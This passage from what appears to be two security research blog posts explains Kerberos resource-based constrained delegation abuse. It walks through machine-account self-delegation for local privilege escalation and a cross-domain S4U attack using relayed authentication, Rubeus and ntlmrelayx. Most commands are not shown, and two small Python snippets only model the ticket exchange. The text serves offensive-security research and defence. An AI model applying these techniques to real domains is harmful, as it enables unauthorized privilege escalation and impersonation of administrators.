This authenticates against 192.168.71.198 where I have impacket's smbserver.py script listening:
In any situation where the machine is domain-joined and you can run code as NT AUTHORITY\NETWORK SERVICE or a Microsoft Virtual Account, you can use RBCD for local privilege escalation, provided that Active Directory hasn't been hardened to mitigate the RBCD attacks completely (which is very rarely the case).
The Situation
So here I'm going to perform the attack from a domain-joined (external.zeroday.lab) IIS server (EIIS1) where code execution has already been achieved. As we already know, this account will authenticate on the domain as the machine account:
Firstly, load the ADModule from Nikhil Mittal and Will Schroeder's PowerView to be used throughout this post:
The last thing to note is a domain admin (and the user we're going to impersonate) is external.admin:
Confusion 2 - Machines Creating Machines
Generally with these RBCD attacks you require a second account with a service principal name (SPN). The common method is to create a new machine account, as by default the machine account quota is 10:
I've seen some confusion on whether a machine account can be used to create another machine account. It is possible to create a machine account using a machine account, this can be done using Kevin Robertson's Powermad:
Now querying the domain controller, the newly created machine account can be seen:
The Crazy Bit
For this post though, I want to show that even if the machine account quota is 0, and access to another account with an SPN hasn't been achieved, it's still possible to abuse RBCD for privilege escalation. So the machine account quota has been reset to 0:
Now it is not possible to create a new machine account:
So here's the main reason for this blog. I was thinking one day "I wonder if a machine can delegate access to itself". So effectively, I (the machine account) want to tell the domain controller that I (the machine account) want the ability to delegate access to myself (the machine account). I'm not sure why this would ever be required in a normal setup, but it is in fact possible.
So using the shell into which I've already imported the ADModule, I can set the msDS-AllowedToActOnBehalfOfOtherIdentity attribute:
This is all that is required to configure RBCD. To demonstrate that it has in fact worked, I can run Get-ADComputer from another terminal (because showing the extended attributes using the ADModule doesn't work):
So now I have the ability to impersonate any domain user on the machine, that isn't in the Protected Users group or marked as Sensitive and cannot be delegated.
Abusing This Configuration
There's one more piece of the puzzle before we can actually perform the attack. We need to be able to pass Rubeus credentials for the machine account. This can be in the form of a username and password, or a TGT ticket.
Luckily Benjamin Delpy figured out how to do this, it's now called the tgtdeleg trick and it's also been implemented in Rubeus.
So after downloading Rubeus onto the compromised system, we can easily use it to grab a usable TGT:
That TGT can be used with the s4u Rubeus command to request a service ticket to HTTP/EIIS1.external.zeroday.lab (myself) as the user external.admin and injected into the current context:
Now when we use Invoke-Command to EIIS1.external.zeroday.lab, it runs as external.admin:
Cleanup
When on an assessment, it's always important to clean up any changes made to systems to return them to the original settings as much as possible. The RBCD configuration can be reset to its original state using the machine account again, if domain admin privileges haven't been achieved.
If the configuration was originally empty, this can be done in the following way:
And to verify that this worked:
Conclusion
Delegation is hard and often configured wrong so it's important to understand the scope of what is possible using these Kerberos features.
Active Directory in its default configuration is vulnerable to a number of different attacks and these settings rarely get changed by the system administrator so this is often a very fruitful avenue for an attacker.
Securing AD against this attack is no different from the mitigations described by Elad in his post; there's nothing really new here apart from the idea of delegating to the same account.
Crossing Trusts 4 Delegation
The purpose of this post is to attempt to explain some research I did not long ago on performing S4U across a domain trust. There doesn't seem to be much research in this area and very little information about the process of requesting the necessary tickets.
I highly recommend reading Elad Shamir's Wagging the Dog post before reading this. Here I'll primarily focus on the differences between performing S4U within a single domain and performing it across a domain trust, and I won't be going into a huge amount of depth on the basics of S4U and its potential for attack, as Elad has already done that so well.
Motivation
I first thought of the ability to perform cross domain S4U when looking at the following Microsoft advisory. It states:
“To re-enable delegation across trusts and return to the original unsafe configuration until constrained or resource-based delegation can be enabled, set the EnableTGTDelegation flag to Yes.”
This makes it clear that it is possible to perform cross domain constrained delegation. The problem was I couldn't find anywhere that gave any real detail as to how it is performed, and the tools used to take advantage of constrained delegation did not support it.
Luckily Will Schroeder published how to simulate real delegation traffic:
This allowed me to figure out how it works and implement it into Rubeus.
Recap
To perform standard constrained delegation, 3 requests and responses are required:
1. AS-REQ and AS-REP, which is just the standard Kerberos authentication.
2. S4U2Self TGS-REQ and TGS-REP, which is the first step in the S4U process.
3. S4U2Proxy TGS-REQ and TGS-REP, which is the actual impersonation to the target service.
I created a visual representation as the ones I've seen previously weren't the easiest to understand:
In this it's the ticket contained within the final TGS-REP that is used to access the target service as the impersonated user.
Some Theory
After hours of using Will's PowerShell to generate S4U traffic and staring at packet dumps, this is how I understood cross domain S4U to work:
Clearly there's a lot more going on here, so let me try to explain.
1. The first step is still the same, a standard Kerberos authentication with the local domain controller. (1 and 2)
2. A service ticket is requested for the foreign domain's krbtgt service from the local domain controller. (3 and 4)
   - The user's real TGT is required for this request.
   - This is known as the inter-realm TGT or cross domain TGT. The resulting service ticket is used to request service tickets for services on the foreign domain from the foreign domain controller.
Here's where things start to get a little complicated, and the S4U2Self starts.
3. A service ticket for yourself as the target user you want to impersonate is requested from the foreign domain controller. (5 and 6)
   - This requires the cross domain TGT.
   - This is the first step in the cross domain S4U2Self process.
4. A service ticket for yourself as the user you want to impersonate is now requested from the local domain controller. (7 and 8)
   - This request includes the user's normal TGT as well as the S4U2Self ticket, received from the foreign domain in step 3, attached as an additional ticket.
   - This is the final step in the cross domain S4U2Self process.
And finally the S4U2Proxy requests. As with S4U2Self, it involves 2 requests, 1 to the local DC and 1 to the foreign DC.
5. A service ticket for the target service (on the foreign domain) is requested from the local domain controller. (9 and 10)
   - This requires the user's real TGT as well as the S4U2Self ticket, received from the local domain controller in step 4, attached as an additional ticket.
   - This is the first step in the cross domain S4U2Proxy process.
6. A service ticket for the target service is requested from the foreign domain controller. (11 and 12)
   - This requires the cross domain TGT as well as the S4U2Proxy ticket, received from the local domain controller in step 5, as an additional ticket.
   - This is the service ticket used to access the target service and the final step in the cross domain S4U2Proxy process.
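The six exchanges described above can be summarised as a small table in code, which makes it easier to see which domain controller handles each request and which tickets travel with it. This is only a restatement of the steps as data, not how Rubeus structures its implementation; the `Exchange` class and its field names are made up for this sketch.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Exchange:
    step: int
    messages: tuple          # message numbers from the description above
    kdc: str                 # "local" or "foreign" domain controller
    purpose: str
    auth_ticket: str         # ticket used to authenticate the request
    additional_ticket: str = ""


CROSS_DOMAIN_S4U = [
    Exchange(1, (1, 2), "local", "standard Kerberos authentication", "none"),
    Exchange(2, (3, 4), "local", "cross domain TGT", "TGT"),
    Exchange(3, (5, 6), "foreign", "S4U2Self, first step", "cross domain TGT"),
    Exchange(4, (7, 8), "local", "S4U2Self, final step", "TGT",
             "S4U2Self ticket from step 3"),
    Exchange(5, (9, 10), "local", "S4U2Proxy, first step", "TGT",
             "S4U2Self ticket from step 4"),
    Exchange(6, (11, 12), "foreign", "S4U2Proxy, final step", "cross domain TGT",
             "S4U2Proxy ticket from step 5"),
]

if __name__ == "__main__":
    for ex in CROSS_DOMAIN_S4U:
        print(ex.step, ex.kdc, ex.purpose, ex.auth_ticket, ex.additional_ticket)
```

Laid out like this, the pattern is visible: requests to the local domain controller always use the real TGT, requests to the foreign one always use the cross domain TGT, and each S4U stage hands its result to the next as an additional ticket.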
I implemented this full process into Rubeus with this PR, which means that the whole process can be carried out with a single command.
The implementation primarily involves the CrossDomainS4U(), CrossDomainKRBTGT(), CrossDomainS4U2Self() and CrossDomainS4U2Proxy() functions, along with the addition of 2 new command line switches, /targetdomain and /targetdc, and some other little modifications.
Basically when /targetdomain and /targetdc are passed on the command line, Rubeus executes a cross domain S4U, otherwise a standard one is performed.
What's The Point?
Good question. This could be a useful attack path in some unusual situations. Let me try to explain one.
Consider the following infrastructure setup:
There are 2 domains, in a single forest. internal.zeroday.lab (the parent and root of the forest) and child1.internal.zeroday.lab (a child domain).
We've compromised a standard user, child.user, on child1.internal.zeroday.lab, this user can also authenticate against the SQL server ISQL1 in internal.zeroday.lab as a low privileged user:
As Elad mentions in the MSSQL section of his blog post, if the SQL server has the WebDAV client installed and running, xp_dirtree can be used to coerce an authentication to port 80.
What is important here is that the machine account quota for internal.zeroday.lab is 0:
This means that the standard method of creating a new machine account using the relayed credentials will not work:
The machine account quota for child1.internal.zeroday.lab is still the default 10 though:
So the user child.user can be used to create a machine account within the child1.internal.zeroday.lab domain:
As the machine account belongs to another domain, ntlmrelayx.py is not able to resolve the name to a SID:
For this reason I made a small modification which allows you to manually specify the SID, rather than a name. First we need the SID of the newly created machine account:
Now the --sid switch can be used to specify the SID of the machine account to delegate access to:
The configuration can be verified using Get-ADComputer:
Impersonation
So now everything is in place to perform the S4U and impersonate users to access ISQL1.
The NTLM hash of the newly created machine account is the last thing that is required:
The following command can be used to perform the full attack and inject the service ticket for immediate use:
This command does a number of things but simply put, it authenticates as TestChildSPN$ from child1.internal.zeroday.lab against IC1DC1.child1.internal.zeroday.lab and impersonates internal.admin from internal.zeroday.lab to access http/ISQL1.internal.zeroday.lab.
Now let's look at this in a bit more detail.
As described previously, the first step is to perform a standard Kerberos authentication and receive the TGT of the account that has been delegated access (TestChildSPN in this case):
This TGT is then used to request the cross domain TGT from IC1DC1.child1.internal.zeroday.lab (the local domain controller):
This is simply a service ticket to krbtgt/internal.zeroday.lab. This cross domain TGT is then used on the foreign domain in exactly the same manner as the user's real TGT is used on the local domain.
It is this ticket that is then used to request the S4U2Self service ticket for TestChildSPN$ for the user internal.admin from IDC1.internal.zeroday.lab (the foreign domain controller):
To complete the S4U2Self process, the S4U2Self service ticket is requested from IC1DC1.child1.internal.zeroday.lab, again for TestChildSPN$ for the user internal.admin, but this time the user's real TGT is used and the S4U2Self service ticket retrieved from the foreign domain in the previous step is attached as an additional ticket within the TGS-REQ:
To begin the impersonation, an S4U2Proxy service ticket is requested for the target service (http/ISQL1.internal.zeroday.lab in this case) from IC1DC1.child1.internal.zeroday.lab. As this request is to the local domain controller, the user's real TGT is used and the local S4U2Self service ticket, received in the previous step, is attached as an additional ticket in the TGS-REQ:
Lastly, an S4U2Proxy service ticket is also requested for http/ISQL1.internal.zeroday.lab from IDC1.internal.zeroday.lab. As this request is to the foreign domain controller, the cross domain TGT is used, and the local S4U2Proxy service ticket received in the previous step is attached as an additional ticket in the TGS-REQ. Once the final ticket is received, Rubeus automatically imports the ticket so it can be used immediately:
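To summarise the six requests walked through above, here is a small Python model of the sequence. It performs no Kerberos traffic and is not how Rubeus implements it. It only records, for each step, which domain controller is contacted, which TGT is presented and which ticket is attached, exactly as described in the text. The Request class, the ticket labels and the function names are hypothetical.

```python
from dataclasses import dataclass
from typing import List, Optional

LOCAL_DC = "IC1DC1.child1.internal.zeroday.lab"   # local domain controller
FOREIGN_DC = "IDC1.internal.zeroday.lab"          # foreign domain controller


@dataclass(frozen=True)
class Request:
    step: str
    kdc: str
    presented_tgt: Optional[str]       # TGT used to authenticate the request
    additional_ticket: Optional[str]   # ticket attached in the TGS-REQ
    result: str                        # label for the ticket that comes back


def cross_domain_s4u_plan() -> List[Request]:
    """Return the requests in the order described in the post."""
    return [
        Request("AS-REQ", LOCAL_DC, None, None, "real TGT"),
        Request("TGS-REQ for krbtgt/internal.zeroday.lab", LOCAL_DC,
                "real TGT", None, "cross domain TGT"),
        Request("S4U2Self", FOREIGN_DC, "cross domain TGT", None,
                "foreign S4U2Self"),
        Request("S4U2Self", LOCAL_DC, "real TGT", "foreign S4U2Self",
                "local S4U2Self"),
        Request("S4U2Proxy", LOCAL_DC, "real TGT", "local S4U2Self",
                "local S4U2Proxy"),
        Request("S4U2Proxy", FOREIGN_DC, "cross domain TGT", "local S4U2Proxy",
                "final service ticket"),
    ]


def tickets_are_available(plan: List[Request]) -> bool:
    """Check that every ticket a step uses was returned by an earlier step."""
    held = set()
    for req in plan:
        for needed in (req.presented_tgt, req.additional_ticket):
            if needed is not None and needed not in held:
                return False
        held.add(req.result)
    return True


if __name__ == "__main__":
    for number, req in enumerate(cross_domain_s4u_plan(), start=1):
        print(number, req.step, "->", req.kdc, "returns", req.result)
```

The pattern to notice is that requests to the local domain controller always present the real TGT, while requests to the foreign domain controller always present the cross domain TGT.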
Now that the final service ticket has been imported it's possible to get code execution on the target server:
Conclusion
While it was possible to perform this across trusts within a single forest, I didn't manage to get this to work across external trusts. It would probably be possible but would require a non-standard trust configuration.
With most configurations this wouldn't be required as you could either create a machine account within the target domain or delegate to the same machine account, as I've discussed in a previous post, but it's important to understand the limits of what is possible with these types of attacks.
The mitigations are exactly the same as Elad discusses in his blog post, as the attack is exactly the same; the only difference is that here I'm performing it across a domain trust.
Acknowledgements
A big thanks to Will Schroeder for all of his work on delegation attacks and Rubeus. Thanks also to Elad Shamir for his detailed work on resource-based constrained delegation attacks and contributions to Rubeus, which helped me greatly when trying to implement this, and to Benjamin Delpy for all of his work on Kerberos tickets in mimikatz and kekeo.
I'm sure there are many more too. Without these guys' work, research in this area would be much further behind where it currently is!